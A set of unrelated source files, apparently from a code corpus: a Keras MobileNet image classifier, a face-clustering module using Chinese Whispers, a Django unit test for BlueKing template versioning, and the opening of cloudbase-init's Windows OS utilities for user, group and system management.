logging.basicConfig(level=logging.INFO, format=log_fmt)
drift_detection()
|
import pandas as pd
import numpy as np
import os, sys
import keras
import matplotlib.pyplot as plt
from keras.applications import MobileNet
from keras.preprocessing import image
from keras.applications.mobilenet import preprocess_input
from keras.models import Model
from keras.optimizers import Adam
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense, GlobalAveragePooling2D
from keras import backend as K
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
#----------------------Parameters----------------------------------------
#dimensions of our images.
img_width, img_height = 224,224 #This matches the MobileNet input size
train_data_dir = '../hotdogs_data/train'
validation_data_dir = '../hotdogs_data/validation'
nb_train_samples = 800 #this divided by the batch size will give the number of steps per epoch
nb_validation_samples = 100
epochs = 50
batch_size = 16 #how many images to include before taking a gradient step
if K.image_data_format() == 'channels_first':
input_shape = (3, img_width, img_height)
else:
input_shape = (img_width, img_height, 3)
# STEP 1 Build the Model-----------------------------------------------------------------------------------------------------------------
base_model=MobileNet(weights='imagenet',include_top=False) #imports the mobilenet model and discards the last 1000 neuron layer.
x=base_model.output
x=GlobalAveragePooling2D()(x)
x=Dense(1024,activation='relu')(x) #we add dense layers so that the model can learn more
x=Dropout(0.75)(x)
x=Dense(64,activation='relu')(x)
x=Dropout(0.5)(x)
preds=Dense(1, activation='sigmoid')(x)
#preds=Dense(2,activation='softmax')(x) #final layer with softmax activation
model=Model(inputs=base_model.input,outputs=preds)
#Check model
for i,layer in enumerate(model.layers):
print(i,layer.name)
#Set the allowed trainable models
for layer in model.layers:
layer.trainable=False
# or if we want to set the first X layers of the network to be non-trainable
for layer in model.layers[:80]:
layer.trainable=False
for layer in model.layers[80:]:
layer.trainable=True
#-----------STEP 2 LOAD the training data-------------------------------------
test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)
# this is the augmentation configuration we will use for training
train_datagen = ImageDataGenerator(
preprocessing_function=preprocess_input,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest'
)
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary')
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
class_weight={0.0: 1.0, 1.0:1.0}
model.fit_generator(
train_generator,
steps_per_epoch=nb_train_samples // batch_size,
epochs=epochs,
validation_data=validation_generator,
validation_steps=nb_validation_samples // batch_size,
class_weight=class_weight)
model.save('transfer_learning_mobile_net.h5')
#os.system("tensorflowjs_converter --input_format keras transfer_learning_mobile_net.h5 ../model/")
|
<reponame>anhlbt/faceidsys
import dlib_api
from image_utils import brightness, get_onedir, clahe_image, printProgressBar
from enum import Enum
from PIL import Image
import numpy as np
from os.path import join, basename, exists, dirname, realpath
from os import makedirs
import numpy as np
import shutil
import sys, os
import cv2
CURRENT_DIR = dirname(realpath(__file__))
PARRENT_DIR = dirname(CURRENT_DIR)
class ClusteringModels(Enum):
CHINESE_WHISPER = 0
K_MEANS = 1
DEFAULT = CHINESE_WHISPER
pass
class Clustering_ChineseWhispers():
def _chinese_whispers(self, encoding_list, threshold=0.38, iterations=1000):
""" Chinese Whispers
Inputs:
:param encoding_list: a list of facial encodings from face_recognition
:param threshold: facial match threshold,default 0.6
:param iterations: since chinese whispers is an iterative algorithm, number of times to iterate
Outputs:
:return sorted_clusters: a list of clusters, a cluster being a list of imagepaths,
sorted by largest cluster to smallest
"""
#from face_recognition.api import _face_distance
from random import shuffle
import networkx as nx
# Create graph
nodes = []
edges = []
image_paths, encodings = zip(*encoding_list)
if len(encodings) <= 1:
print ("No enough encodings to cluster!")
return []
for idx, face_encoding_to_check in enumerate(encodings):
# Adding node of facial encoding
node_id = idx+1
# Initialize 'cluster' to unique value (cluster of itself)
node = (node_id, {'cluster': image_paths[idx], 'path': image_paths[idx]})
nodes.append(node)
# Facial encodings to compare
if (idx+1) >= len(encodings):
# Node is last element, don't create edge
break
compare_encodings = encodings[idx+1:]
distances = dlib_api.face_distance(compare_encodings, face_encoding_to_check)
# print(distances)
encoding_edges = []
for i, distance in enumerate(distances):
if distance <= threshold:
# Add edge if facial match
edge_id = idx+i+2
encoding_edges.append((node_id, edge_id, {'weight': distance}))
edges = edges + encoding_edges
G = nx.Graph()
G.add_nodes_from(nodes)
G.add_edges_from(edges)
# Iterate
for _ in range(0, iterations):
cluster_nodes = G.nodes()
# shuffle(cluster_nodes)
for node in cluster_nodes:
neighbors = G[node]
clusters = {}
for ne in neighbors:
if isinstance(ne, int):
if G.node[ne]['cluster'] in clusters:
clusters[G.node[ne]['cluster']] += G[node][ne]['weight']
else:
clusters[G.node[ne]['cluster']] = G[node][ne]['weight']
# find the class with the highest edge weight sum
edge_weight_sum = 0
max_cluster = G.node[node]['cluster']
for cluster in clusters:
if clusters[cluster] > edge_weight_sum:
edge_weight_sum = clusters[cluster]
max_cluster = cluster
# set the class of target node to the winning local class
G.node[node]['cluster'] = max_cluster
clusters = {}
print(G)
print(list(nx.connected_components(G)))
print(nx.number_connected_components(G))
# Prepare cluster output
for (_, data) in G.node.items():
cluster = data['cluster']
path = data['path']
if cluster:
if cluster not in clusters:
clusters[cluster] = []
clusters[cluster].append(path)
# Sort cluster output
sorted_clusters = sorted(clusters.values(), key=len, reverse=True)
return sorted_clusters
def fit(self, facial_encodings, output_dir):
""" Main
Given a list of images, save out facial encoding data files and copy
images into folders of face clusters.
"""
# Only use the chinese whispers algorithm for now
sorted_clusters = self._chinese_whispers(facial_encodings.items())
num_cluster = len(sorted_clusters)
# Copy image files to cluster folders
for idx, cluster in enumerate(sorted_clusters):
cluster_dir = join(output_dir, str(idx))
if not exists(cluster_dir):
makedirs(cluster_dir)
for path in cluster:
shutil.copy(path, join(cluster_dir, basename(path)))
class Clustering():
def __init__(self,image_folder,out_path, cluster_alg = ClusteringModels.DEFAULT):
if not exists(output_dir):
makedirs(output_dir)
self._clustering = None
self.out_path = out_path
self.facial_encodings = self.compute_facial_encodings(get_onedir(image_folder))
if len(facial_encodings) <= 1:
print ("Number of facial encodings must be greater than one, can't cluster")
return
if cluster_alg == ClusteringModels.CHINESE_WHISPER:
self._clustering = Clustering_ChineseWhispers()
elif cluster_alg == ClusteringModels.K_MEANS:
self._clustering = None
def fit(self):
self._clustering.fit(self.facial_encodings, self.out_path)
def compute_facial_encodings(self, paths):
"""
Inputs:
:param image_paths: a list of image paths
Outputs:
:return facial_encodings: (image_path, facial_encoding) dictionary of facial encodings
"""
facial_encodings = {}
#Initial call to print 0% progress
printProgressBar(0, len(paths), prefix = 'Progress:', suffix = 'Complete', length = 50)
for x in range(len(paths)):
# Update process bar
printProgressBar(x, len(paths), prefix = 'Progress:', suffix = 'Complete', length = 50)
face_encoding = []
try:
item = paths[x]
if True in [item.endswith(ext) for ext in ['jpg', 'jpeg', 'png', 'JPG', 'bmp']]:
# if item.endswith(".png") or item.endswith(".jpg") or item.endswith('.tiff') or item.endswith('.jpeg'):
path, filename = os.path.split(item)
frame = cv2.imread(item)
height = frame.shape[0]
width = frame.shape[1]
# in phrase crop face we have extend size already
face_loc = [(10, width - 10, height - 10, 10)]## top, right, bottom, left = face_location
# cv2.rectangle(frame, (10,10), ( width - 10,height - 10), (0, 255, 0), 2)
# cv2.imshow("test", frame)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# frame_gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
# clahe_img = clahe_image(frame_gray)
# face_loc = dlib_api.face_locations(clahe_img, 1, 'hog')
# img = Image.open(item, 'r')
# img = brightness(img, 2)
# image = np.array(img)
# image /= image.std()
face_encoding = dlib_api.face_encodings(frame, face_loc)
face_encoding2 = dlib_api.face_encodings(frame)
if len(face_encoding) == 0:
print("no face detected on this one", item)
else:
facial_encodings[item] = face_encoding[0]
except Exception as ex:
print(ex)
return facial_encodings
if __name__=="__main__":
print("#"*50)
# _cluster = Clustering(image_folder = join(PARRENT_DIR, "data/5people_clustering"),\
# out_path=join(PARRENT_DIR, "data/clustering_out"))
image_folder = "/home/500/anh_lbt/IMAGE_TASK/Photos_out"
out_path=join(PARRENT_DIR, "data/clustering_out")
if not os.path.exists(out_path):
os.makedirs(out_path)
_cluster = Clustering(image_folder, out_path)
_cluster.fit() |
<filename>gcloud/tests/template_base/models/base_template_manager/test_check_templates_subprocess_expired.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from mock import patch, MagicMock
from django.test import TestCase
from gcloud.tests.mock_settings import * # noqa
from gcloud.template_base.models import BaseTemplateManager
class CheckTemplatesSubprocessExpiredTestCase(TestCase):
def test_normal(self):
r1 = MagicMock()
r2 = MagicMock()
r3 = MagicMock()
r4 = MagicMock()
r5 = MagicMock()
r1.ancestor_template_id = "a1"
r1.descendant_template_id = "d1"
r1.subprocess_node_id = "n1"
r1.version = "v1"
r1.always_use_latest = True
r2.ancestor_template_id = "a1"
r2.descendant_template_id = "d2"
r2.subprocess_node_id = "n2"
r2.version = "v2"
r2.always_use_latest = False
r3.ancestor_template_id = "a2"
r3.descendant_template_id = "d3"
r3.subprocess_node_id = "n3"
r3.version = "v3"
r3.always_use_latest = False
r4.ancestor_template_id = "a2"
r4.descendant_template_id = "d4"
r4.subprocess_node_id = "n4"
r4.version = "v4"
r4.always_use_latest = True
r5.ancestor_template_id = "a3"
r5.descendant_template_id = "d5"
r5.subprocess_node_id = "n5"
r5.version = "v5"
r5.always_use_latest = False
v1 = MagicMock()
v2 = MagicMock()
v3 = MagicMock()
v4 = MagicMock()
v5 = MagicMock()
v1.template_id = "d1"
v1.current_version = "v1_new"
v2.template_id = "d2"
v2.current_version = "v2"
v3.template_id = "d3"
v3.current_version = "v3_new"
v4.template_id = "d4"
v4.current_version = "v4_new"
v5.template_id = "d5"
v5.current_version = "v5"
TemplateRelationship = MagicMock()
TemplateRelationship.objects.filter = MagicMock(return_value=[r1, r2, r3, r4, r5])
TemplateCurrentVersion = MagicMock()
TemplateCurrentVersion.objects.filter = MagicMock(return_value=[v1, v2, v3, v4, v5])
with patch(TEMPLATE_BASE_MODELS_TEMPLATE_RELATIONSHIP, TemplateRelationship):
with patch(TEMPLATE_BASE_MODELS_TEMPLATE_CURRENT_VERSION, TemplateCurrentVersion):
expired_template_id = BaseTemplateManager().check_templates_subprocess_expired(
[
{"id": "t1", "pipeline_template_id": "a1"},
{"id": "t1", "pipeline_template_id": "a1"},
{"id": "t2", "pipeline_template_id": "a2"},
{"id": "t2", "pipeline_template_id": "a2"},
{"id": "t3", "pipeline_template_id": "a3"},
]
)
self.assertEqual(expired_template_id, ["t2"])
|
<reponame>andia10240/cloudbase-init
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import ctypes
from ctypes import wintypes
import os
import re
import struct
import subprocess
import time
import netaddr
from oslo_log import log as oslo_logging
import pywintypes
import six
from six.moves import winreg
from tzlocal import windows_tz
import win32api
from win32com import client
import win32net
import win32netcon
import win32process
import win32security
import win32service
import winerror
from cloudbaseinit import constant
from cloudbaseinit import exception
from cloudbaseinit.osutils import base
from cloudbaseinit.utils import classloader
from cloudbaseinit.utils import retry_decorator
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import network
from cloudbaseinit.utils.windows import privilege
from cloudbaseinit.utils.windows import timezone
from cloudbaseinit.utils.windows import wmi_loader
wmi = wmi_loader.wmi()
LOG = oslo_logging.getLogger(__name__)
AF_INET = 2
AF_INET6 = 23
UNICAST = 1
MANUAL = 1
PREFERRED_ADDR = 4
advapi32 = ctypes.windll.advapi32
kernel32 = ctypes.windll.kernel32
netapi32 = ctypes.windll.netapi32
userenv = ctypes.windll.userenv
iphlpapi = ctypes.windll.iphlpapi
Ws2_32 = ctypes.windll.Ws2_32
setupapi = ctypes.windll.setupapi
msvcrt = ctypes.cdll.msvcrt
ntdll = ctypes.windll.ntdll
secur32 = ctypes.windll.secur32
class Win32_PROFILEINFO(ctypes.Structure):
_fields_ = [
('dwSize', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('lpUserName', wintypes.LPWSTR),
('lpProfilePath', wintypes.LPWSTR),
('lpDefaultPath', wintypes.LPWSTR),
('lpServerName', wintypes.LPWSTR),
('lpPolicyPath', wintypes.LPWSTR),
('hprofile', wintypes.HANDLE)
]
class Win32_LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
_fields_ = [
('lgrmi3_domainandname', wintypes.LPWSTR)
]
class Win32_MIB_IPFORWARDROW(ctypes.Structure):
_fields_ = [
('dwForwardDest', wintypes.DWORD),
('dwForwardMask', wintypes.DWORD),
('dwForwardPolicy', wintypes.DWORD),
('dwForwardNextHop', wintypes.DWORD),
('dwForwardIfIndex', wintypes.DWORD),
('dwForwardType', wintypes.DWORD),
('dwForwardProto', wintypes.DWORD),
('dwForwardAge', wintypes.DWORD),
('dwForwardNextHopAS', wintypes.DWORD),
('dwForwardMetric1', wintypes.DWORD),
('dwForwardMetric2', wintypes.DWORD),
('dwForwardMetric3', wintypes.DWORD),
('dwForwardMetric4', wintypes.DWORD),
('dwForwardMetric5', wintypes.DWORD)
]
class Win32_MIB_IPFORWARDTABLE(ctypes.Structure):
_fields_ = [
('dwNumEntries', wintypes.DWORD),
('table', Win32_MIB_IPFORWARDROW * 1)
]
class Win32_OSVERSIONINFOEX_W(ctypes.Structure):
_fields_ = [
('dwOSVersionInfoSize', wintypes.DWORD),
('dwMajorVersion', wintypes.DWORD),
('dwMinorVersion', wintypes.DWORD),
('dwBuildNumber', wintypes.DWORD),
('dwPlatformId', wintypes.DWORD),
('szCSDVersion', wintypes.WCHAR * 128),
('wServicePackMajor', wintypes.WORD),
('wServicePackMinor', wintypes.WORD),
('wSuiteMask', wintypes.WORD),
('wProductType', wintypes.BYTE),
('wReserved', wintypes.BYTE)
]
class Win32_SP_DEVICE_INTERFACE_DATA(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('InterfaceClassGuid', disk.GUID),
('Flags', wintypes.DWORD),
('Reserved', ctypes.POINTER(wintypes.ULONG))
]
class Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('DevicePath', ctypes.c_byte * 2)
]
class Win32_STORAGE_DEVICE_NUMBER(ctypes.Structure):
_fields_ = [
('DeviceType', wintypes.DWORD),
('DeviceNumber', wintypes.DWORD),
('PartitionNumber', wintypes.DWORD)
]
class Win32_STARTUPINFO_W(ctypes.Structure):
_fields_ = [
('cb', wintypes.DWORD),
('lpReserved', wintypes.LPWSTR),
('lpDesktop', wintypes.LPWSTR),
('lpTitle', wintypes.LPWSTR),
('dwX', wintypes.DWORD),
('dwY', wintypes.DWORD),
('dwXSize', wintypes.DWORD),
('dwYSize', wintypes.DWORD),
('dwXCountChars', wintypes.DWORD),
('dwYCountChars', wintypes.DWORD),
('dwFillAttribute', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('wShowWindow', wintypes.WORD),
('cbReserved2', wintypes.WORD),
('lpReserved2', ctypes.POINTER(wintypes.BYTE)),
('hStdInput', wintypes.HANDLE),
('hStdOutput', wintypes.HANDLE),
('hStdError', wintypes.HANDLE),
]
class Win32_PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
('hProcess', wintypes.HANDLE),
('hThread', wintypes.HANDLE),
('dwProcessId', wintypes.DWORD),
('dwThreadId', wintypes.DWORD),
]
advapi32.CreateProcessAsUserW.argtypes = [wintypes.HANDLE,
wintypes.LPCWSTR,
wintypes.LPWSTR,
ctypes.c_void_p,
ctypes.c_void_p,
wintypes.BOOL,
wintypes.DWORD,
ctypes.c_void_p,
wintypes.LPCWSTR,
ctypes.POINTER(
Win32_STARTUPINFO_W),
ctypes.POINTER(
Win32_PROCESS_INFORMATION)]
advapi32.CreateProcessAsUserW.restype = wintypes.BOOL
msvcrt.malloc.argtypes = [ctypes.c_size_t]
msvcrt.malloc.restype = ctypes.c_void_p
msvcrt.free.argtypes = [ctypes.c_void_p]
msvcrt.free.restype = None
ntdll.RtlGetVersion.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W)]
ntdll.RtlGetVersion.restype = wintypes.DWORD
ntdll.RtlVerifyVersionInfo.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W),
wintypes.DWORD, wintypes.ULARGE_INTEGER]
ntdll.RtlVerifyVersionInfo.restype = wintypes.DWORD
kernel32.VerSetConditionMask.argtypes = [wintypes.ULARGE_INTEGER,
wintypes.DWORD,
wintypes.BYTE]
kernel32.VerSetConditionMask.restype = wintypes.ULARGE_INTEGER
kernel32.SetComputerNameExW.argtypes = [ctypes.c_int, wintypes.LPCWSTR]
kernel32.SetComputerNameExW.restype = wintypes.BOOL
kernel32.GetLogicalDriveStringsW.argtypes = [wintypes.DWORD, wintypes.LPWSTR]
kernel32.GetLogicalDriveStringsW.restype = wintypes.DWORD
kernel32.GetDriveTypeW.argtypes = [wintypes.LPCWSTR]
kernel32.GetDriveTypeW.restype = wintypes.UINT
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD,
wintypes.DWORD, wintypes.LPVOID,
wintypes.DWORD, wintypes.DWORD,
wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
kernel32.GetProcessHeap.argtypes = []
kernel32.GetProcessHeap.restype = wintypes.HANDLE
kernel32.HeapAlloc.argtypes = [wintypes.HANDLE, wintypes.DWORD,
ctypes.c_size_t]
kernel32.HeapAlloc.restype = wintypes.LPVOID
kernel32.HeapFree.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID]
kernel32.HeapFree.restype = wintypes.BOOL
kernel32.GetVolumeNameForVolumeMountPointW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.GetVolumeNameForVolumeMountPointW.restype = wintypes.BOOL
kernel32.GetVolumePathNamesForVolumeNameW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD,
ctypes.POINTER(
wintypes.DWORD)]
kernel32.GetVolumePathNamesForVolumeNameW.restype = wintypes.BOOL
kernel32.FindFirstVolumeW.argtypes = [wintypes.LPWSTR, wintypes.DWORD]
kernel32.FindFirstVolumeW.restype = wintypes.HANDLE
kernel32.FindNextVolumeW.argtypes = [wintypes.HANDLE,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.FindNextVolumeW.restype = wintypes.BOOL
kernel32.FindVolumeClose.argtypes = [wintypes.HANDLE]
kernel32.FindVolumeClose.restype = wintypes.BOOL
iphlpapi.GetIpForwardTable.argtypes = [
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE),
ctypes.POINTER(wintypes.ULONG),
wintypes.BOOL]
iphlpapi.GetIpForwardTable.restype = wintypes.DWORD
Ws2_32.inet_ntoa.restype = ctypes.c_char_p
secur32.GetUserNameExW.argtypes = [wintypes.DWORD,
wintypes.LPWSTR,
ctypes.POINTER(wintypes.ULONG)]
secur32.GetUserNameExW.restype = wintypes.BOOL
setupapi.SetupDiGetClassDevsW.argtypes = [ctypes.POINTER(disk.GUID),
wintypes.LPCWSTR,
wintypes.HANDLE,
wintypes.DWORD]
setupapi.SetupDiGetClassDevsW.restype = wintypes.HANDLE
setupapi.SetupDiEnumDeviceInterfaces.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
ctypes.POINTER(disk.GUID),
wintypes.DWORD,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA)]
setupapi.SetupDiEnumDeviceInterfaces.restype = wintypes.BOOL
setupapi.SetupDiGetDeviceInterfaceDetailW.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W),
wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
setupapi.SetupDiGetDeviceInterfaceDetailW.restype = wintypes.BOOL
setupapi.SetupDiDestroyDeviceInfoList.argtypes = [wintypes.HANDLE]
setupapi.SetupDiDestroyDeviceInfoList.restype = wintypes.BOOL
VER_MAJORVERSION = 1
VER_MINORVERSION = 2
VER_BUILDNUMBER = 4
VER_GREATER_EQUAL = 3
GUID_DEVINTERFACE_DISK = disk.GUID(0x53f56307, 0xb6bf, 0x11d0, 0x94, 0xf2,
0x00, 0xa0, 0xc9, 0x1e, 0xfb, 0x8b)
class WindowsUtils(base.BaseOSUtils):
NERR_GroupNotFound = 2220
NERR_UserNotFound = 2221
ERROR_PATH_NOT_FOUND = 3
ERROR_ACCESS_DENIED = 5
ERROR_INSUFFICIENT_BUFFER = 122
ERROR_INVALID_NAME = 123
ERROR_NO_DATA = 232
ERROR_MORE_DATA = 234
ERROR_NO_SUCH_MEMBER = 1387
ERROR_MEMBER_IN_ALIAS = 1378
ERROR_INVALID_MEMBER = 1388
ERROR_NO_MORE_FILES = 18
STATUS_REVISION_MISMATCH = 0xC0000059
ADS_UF_PASSWORD_EXPIRED = 0x800000
PASSWORD_CHANGED_FLAG = 1
INVALID_HANDLE_VALUE = 0xFFFFFFFF
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
IOCTL_STORAGE_GET_DEVICE_NUMBER = 0x002D1080
MAX_PATH = 260
DIGCF_PRESENT = 2
DIGCF_DEVICEINTERFACE = 0x10
DRIVE_CDROM = 5
INFINITE = 0xFFFFFFFF
CREATE_NEW_CONSOLE = 0x10
LOGON32_LOGON_BATCH = 4
LOGON32_LOGON_INTERACTIVE = 2
LOGON32_LOGON_SERVICE = 5
LOGON32_PROVIDER_DEFAULT = 0
EXTENDED_NAME_FORMAT_SAM_COMPATIBLE = 2
SERVICE_STATUS_STOPPED = "Stopped"
SERVICE_STATUS_START_PENDING = "Start Pending"
SERVICE_STATUS_STOP_PENDING = "Stop Pending"
SERVICE_STATUS_RUNNING = "Running"
SERVICE_STATUS_CONTINUE_PENDING = "Continue Pending"
SERVICE_STATUS_PAUSE_PENDING = "Pause Pending"
SERVICE_STATUS_PAUSED = "Paused"
SERVICE_STATUS_UNKNOWN = "Unknown"
SERVICE_START_MODE_AUTOMATIC = "Automatic"
SERVICE_START_MODE_MANUAL = "Manual"
SERVICE_START_MODE_DISABLED = "Disabled"
_SERVICE_START_TYPE_MAP = {
SERVICE_START_MODE_AUTOMATIC:
win32service.SERVICE_AUTO_START,
SERVICE_START_MODE_MANUAL:
win32service.SERVICE_DEMAND_START,
SERVICE_START_MODE_DISABLED:
win32service.SERVICE_DISABLED}
_SERVICE_STATUS_MAP = {
win32service.SERVICE_CONTINUE_PENDING:
SERVICE_STATUS_CONTINUE_PENDING,
win32service.SERVICE_PAUSE_PENDING:
SERVICE_STATUS_PAUSE_PENDING,
win32service.SERVICE_PAUSED:
SERVICE_STATUS_PAUSED,
win32service.SERVICE_RUNNING:
SERVICE_STATUS_RUNNING,
win32service.SERVICE_START_PENDING:
SERVICE_STATUS_START_PENDING,
win32service.SERVICE_STOP_PENDING:
SERVICE_STATUS_STOP_PENDING,
win32service.SERVICE_STOPPED:
SERVICE_STATUS_STOPPED,
}
ComputerNamePhysicalDnsHostname = 5
_config_key = 'SOFTWARE\\Cloudbase Solutions\\Cloudbase-Init\\'
_service_name = 'cloudbase-init'
_FW_IP_PROTOCOL_TCP = 6
_FW_IP_PROTOCOL_UDP = 17
_FW_SCOPE_ALL = 0
_FW_SCOPE_LOCAL_SUBNET = 1
VER_NT_WORKSTATION = 1
def __init__(self):
self._network_team_manager = None
def reboot(self):
with privilege.acquire_privilege(win32security.SE_SHUTDOWN_NAME):
ret_val = advapi32.InitiateSystemShutdownExW(
0, "Cloudbase-Init reboot",
0, True, True, 0)
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Reboot failed: %r")
def user_exists(self, username):
try:
self._get_user_info(username, 1)
return True
except exception.ItemNotFoundException:
# User not found
return False
def create_user(self, username, password, password_expires=False):
user_info = {
"name": username,
"password": password,
"priv": win32netcon.USER_PRIV_USER,
"flags": win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT,
}
if not password_expires:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserAdd(None, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create user failed: %s" % ex.args[2])
def rename_user(self, username, new_username):
user_info = {
"name": new_username,
}
try:
win32net.NetUserSetInfo(None, username, 0, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Renaming user failed: %s" % ex.args[2])
def set_user_info(self, username, full_name=None,
disabled=False, expire_interval=None):
user_info = self._get_user_info(username, 2)
if full_name:
user_info["full_name"] = full_name
if disabled:
user_info["flags"] |= win32netcon.UF_ACCOUNTDISABLE
else:
user_info["flags"] &= ~win32netcon.UF_ACCOUNTDISABLE
if expire_interval is not None:
user_info["acct_expires"] = int(expire_interval)
else:
user_info["acct_expires"] = win32netcon.TIMEQ_FOREVER
try:
win32net.NetUserSetInfo(None, username, 2, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
LOG.debug(ex)
raise exception.CloudbaseInitException(
"Setting user info failed: %s" % ex.args[2])
def enum_users(self):
usernames = []
resume_handle = 0
while True:
try:
users_info, total, resume_handle = win32net.NetUserEnum(
None, 0, win32netcon.FILTER_NORMAL_ACCOUNT, resume_handle)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Enumerating users failed: %s" % ex.args[2])
usernames += [u["name"] for u in users_info]
if not resume_handle:
return usernames
def is_builtin_admin(self, username):
sid = self.get_user_sid(username)
return sid and sid.startswith(u"S-1-5-") and sid.endswith(u"-500")
def _get_user_info(self, username, level):
try:
return win32net.NetUserGetInfo(None, username, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Failed to get user info: %s" % ex.args[2])
def set_user_password(self, username, password, password_expires=False):
user_info = self._get_user_info(username, 1)
user_info["password"] = password
if password_expires:
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
else:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserSetInfo(None, username, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Set user password failed: %s" % ex.args[2])
def change_password_next_logon(self, username):
"""Force the given user to change the password at next logon."""
user_info = self._get_user_info(username, 4)
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
user_info["password_expired"] = 1
try:
win32net.NetUserSetInfo(None, username, 4, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Setting password expiration failed: %s" % ex.args[2])
def group_exists(self, group):
try:
self._get_group_info(group, 1)
return True
except exception.ItemNotFoundException:
# Group not found
return False
def _get_group_info(self, group, level):
try:
return win32net.NetLocalGroupGetInfo(None, group, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_GroupNotFound:
raise exception.ItemNotFoundException(
"Group not found: %s" % group)
else:
raise exception.CloudbaseInitException(
"Failed to get group info: %s" % ex.args[2])
def create_group(self, group, description=None):
group_info = {"name": group}
try:
win32net.NetLocalGroupAdd(None, 0, group_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create group failed: %s" % ex.args[2])
@staticmethod
def _get_cch_referenced_domain_name(domain_name):
return wintypes.DWORD(
ctypes.sizeof(domain_name) // ctypes.sizeof(wintypes.WCHAR))
def _get_user_sid_and_domain(self, username):
sid = ctypes.create_string_buffer(1024)
cbSid = wintypes.DWORD(ctypes.sizeof(sid))
domainName = ctypes.create_unicode_buffer(1024)
cchReferencedDomainName = self._get_cch_referenced_domain_name(
domainName)
sidNameUse = wintypes.DWORD()
ret_val = advapi32.LookupAccountNameW(
0, six.text_type(username), sid, ctypes.byref(cbSid), domainName,
ctypes.byref(cchReferencedDomainName), ctypes.byref(sidNameUse))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot get user SID: %r")
return sid, domainName.value
def add_user_to_local_group(self, username, groupname):
